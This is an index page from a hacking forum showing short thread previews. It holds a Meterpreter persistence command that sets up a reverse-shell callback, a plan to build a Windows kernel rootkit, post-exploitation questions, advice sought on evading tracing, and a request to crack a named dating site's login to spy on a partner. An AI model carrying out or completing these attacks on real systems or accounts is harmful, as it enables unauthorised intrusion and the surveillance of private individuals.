Null Byte Forum

Forum Thread: Meterpreter Persistence Issue

I am playing around with this tutorial and if I try this command run persistence -A -L /var/ -X 30 -p 4444 -r 10.601.37 it tells me x86/linux version of Meterpreter is not supported with this Script! and if I define -P with linux/meterpreter/reversetcp it still says the same thing. Am I doing something wrong?

Forum Thread: Problem with Kali Dual Boot

Hello HowTo users, I recently have been trying to Dual Boot Kali Linux on my computer. I got the iso image of the OS from the official Linux website, the version is 1.1.0a-amd64. I burned the image onto a blank CD (Maxwell DVD+RW 4.7 GB) I then restarted my system and booted into the CD but after a while of loading nothing appears, the monitor remains black. I'm running Windows 8.1 BTW and if I hit a couple keys after getting tired of waiting the system just boots into Windows.

Forum Thread: How to Dual Boot Window 7 and Kali Linux 1.1.0

Hello guys, I'm newbie for using kali linux 1.1.0. I have tried to dual boot Window 10 and Kali Sana 2.0 and i succeed with it. But when i try to dual boot Window 7 with kali linux 1.1.0, i cant make it. I have install Kali linux 1.1.0 same way as i install Kali Sana 2.0, but after finish partition for kali linux, i received this message "no efi partition found". I ignore the message and continue with installation. Once finish , my pc boot directly to window and does not enter grub boot. Need...

Forum Thread: Windows 10 Rootkit

I've been silently following this community for a while, and it seems to be by far the friendliest one out there, as well as have a mix of all different levels of talent. Because of this, I was posting to see if anyone had any experience with building rootkits. I've decided to try and build a kernel level rootkit for Windows 10. If I were to post updates about the progress, would anyone be interested and able to give out pointers or advice?

Forum Thread: A Brief Summary for Newbies on Null-Byte

hello my new dear colleagues on nullbyte, welcome to the world of white-hat / hackers, I could see that lately there have been many posts coming from new users with basic questions such as: how to download programs on kali linux, what type of wireless card,how to install programs, so I decided to give a brief summary for newbies like me, to say that i am still learning and if I'm wrong someone makes me correction.

Forum Thread: Website Bot

I am interested in making a website bot. I've googled how-to's but find that they are much more complex than I am needing and I am a noob coder. I am trying to build a bot that can sign-in into multiple accounts in chrome incognito mode and automatically search 30 times on a scheduled clock. I have no direction of where to begin, does anyone have any ideas?

Forum Thread: Is It Even Worth Brute Force Cracking a Web Based Login?

Just wondering. From what I can gather, it just doesn't work out. What about dictionary attack? I'm trying to crack a login for a small site called soberandsingle.com. My girlfriend went to treatment for alcoholism and I was really proud of her. A friend of mine said he thought he saw her picture on this site. I double check and sure enoughit. I'm trying to figure going on. I'm somewhat familiar with thc hydra and tamper data. Im just wondering if it's even possible. Like I said its a smaller...

Forum Thread: What Are Some Useful Resources/Tutorials for Discovering Information Once You Have a Meterpreter Session Running on a Wi

I am looking for any information on how to find the admin password on a computer and after that ways i can go around the system and get other useful information i have a meterpreter session running on the windows machine but it is in a non admin privileged account. Also any helpful tutorials on how to use the meterpreter as I am new to this and only knowledge I have is what is provided when you type "help" however I am sure there is a lot more.

Forum Thread: Protecting Yourself When Remotely Accessing an Exploit.

Hello, So if you are trying to perform a remote exploit on a computer say using meterpreter is there a way to access it without using your personal IP address to prevent it being traced? Could you somehow use a VPN? For example could you somehow set the RHOST to a VPN IP and then connect to that VPN? Sorry if my question is confusing or if it is redundant but any help would be greatly appreciated. Thanks!